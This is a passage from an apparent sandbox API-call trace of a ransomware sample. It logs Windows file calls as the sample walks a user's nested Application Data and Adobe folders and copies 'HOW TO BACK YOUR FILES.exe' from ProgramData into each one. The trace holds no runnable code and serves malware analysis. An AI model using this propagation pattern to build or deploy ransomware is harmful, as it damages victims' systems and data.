Data\\Application Data\\Application Data\\Adobe\\Color\\Profiles") returned 150 [0106.618] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color\\Profiles" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color\\Profiles") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color\\Profiles" [0106.618] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0106.618] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color\\Profiles\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\application data\\application data\\application data\\adobe\\color\\profiles\\how to back your files.exe"), bFailIfExists=1) returned 0 [0106.619] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0106.619] GetLastError () returned 0x0 [0106.619] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0106.619] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0106.619] CloseHandle (hObject=0x120) returned 1 [0106.619] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0106.619] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0106.619] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color\\Profiles\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xce4463a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x70cce2e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x70cce2e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0106.620] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0106.620] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0106.620] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat" [0106.620] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0106.620] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c28 | out: hHeap=0x2b0000) returned 1 [0106.621] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat") returned 143 [0106.621] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat" [0106.621] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0106.622] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\application data\\application data\\application data\\adobe\\acrobat\\how to back your files.exe"), bFailIfExists=1) returned 0 [0106.622] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0106.623] GetLastError () returned 0x0 [0106.623] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0106.623] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0106.623] CloseHandle (hObject=0x120) returned 1 [0106.623] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0106.623] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0106.623] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4febe4e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4febe4e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0106.623] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0106.623] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0106.623] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0" [0106.623] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d6cf0 | out: hHeap=0x2b0000) returned 1 [0106.623] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c28 | out: hHeap=0x2b0000) returned 1 [0106.623] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0") returned 148 [0106.623] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0" [0106.624] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0106.624] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\application data\\application data\\application data\\adobe\\acrobat\\10.0\\how to back your files.exe"), bFailIfExists=1) returned 0 [0106.624] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0106.624] GetLastError () returned 0x0 [0106.625] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0106.625] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0106.625] CloseHandle (hObject=0x120) returned 1 [0106.625] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0106.625] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0106.625] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7103a280, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x7103a280, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0106.625] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0106.625] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0106.625] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Cache", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Cache") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Cache" [0106.625] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e2710 | out: hHeap=0x2b0000) returned 1 [0106.625] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c28 | out: hHeap=0x2b0000) returned 1 [0106.625] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Cache") returned 154 [0106.625] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Cache" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Cache") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Cache" [0106.625] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0106.625] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Cache\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\application data\\application data\\application data\\adobe\\acrobat\\10.0\\cache\\how to back your files.exe"), bFailIfExists=1) returned 0 [0106.626] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0106.626] GetLastError () returned 0x0 [0106.626] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0106.626] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0106.626] CloseHandle (hObject=0x120) returned 1 [0106.626] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0106.626] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0106.627] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Cache\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xecb5bdd0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0x710603e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x710603e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0106.627] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0106.627] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0106.627] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe" [0106.627] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c8eb8 | out: hHeap=0x2b0000) returned 1 [0106.627] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b88 | out: hHeap=0x2b0000) returned 1 [0106.627] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe") returned 118 [0106.627] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe" [0106.627] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0106.627] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\application data\\application data\\adobe\\how to back your files.exe"), bFailIfExists=1) returned 0 [0106.628] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0106.628] GetLastError () returned 0x0 [0106.628] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0106.628] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0106.628] CloseHandle (hObject=0x120) returned 1 [0106.628] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0106.628] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0106.628] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4febe4e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4febe4e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0106.628] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0106.628] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0106.629] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color" [0106.629] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3370d0 | out: hHeap=0x2b0000) returned 1 [0106.629] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c28 | out: hHeap=0x2b0000) returned 1 [0106.629] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color") returned 124 [0106.629] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color" [0106.629] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0106.629] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\application data\\application data\\adobe\\color\\how to back your files.exe"), bFailIfExists=1) returned 0 [0106.629] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0106.630] GetLastError () returned 0x0 [0106.630] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0106.630] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0106.630] CloseHandle (hObject=0x120) returned 1 [0106.630] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0106.630] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0106.630] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x70bc3940, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x70bc3940, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0106.630] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0106.630] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0106.630] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color\\Profiles", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color\\Profiles") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color\\Profiles" [0106.630] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d6cf0 | out: hHeap=0x2b0000) returned 1 [0106.630] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c28 | out: hHeap=0x2b0000) returned 1 [0106.631] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color\\Profiles") returned 133 [0106.631] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color\\Profiles" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color\\Profiles") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color\\Profiles" [0106.631] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0106.631] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color\\Profiles\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\application data\\application data\\adobe\\color\\profiles\\how to back your files.exe"), bFailIfExists=1) returned 0 [0106.631] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0106.632] GetLastError () returned 0x0 [0106.632] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0106.632] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0106.632] CloseHandle (hObject=0x120) returned 1 [0106.632] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0106.632] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0106.632] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color\\Profiles\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xce4463a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x70cce2e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x70cce2e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0106.632] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0106.632] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0106.632] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat") 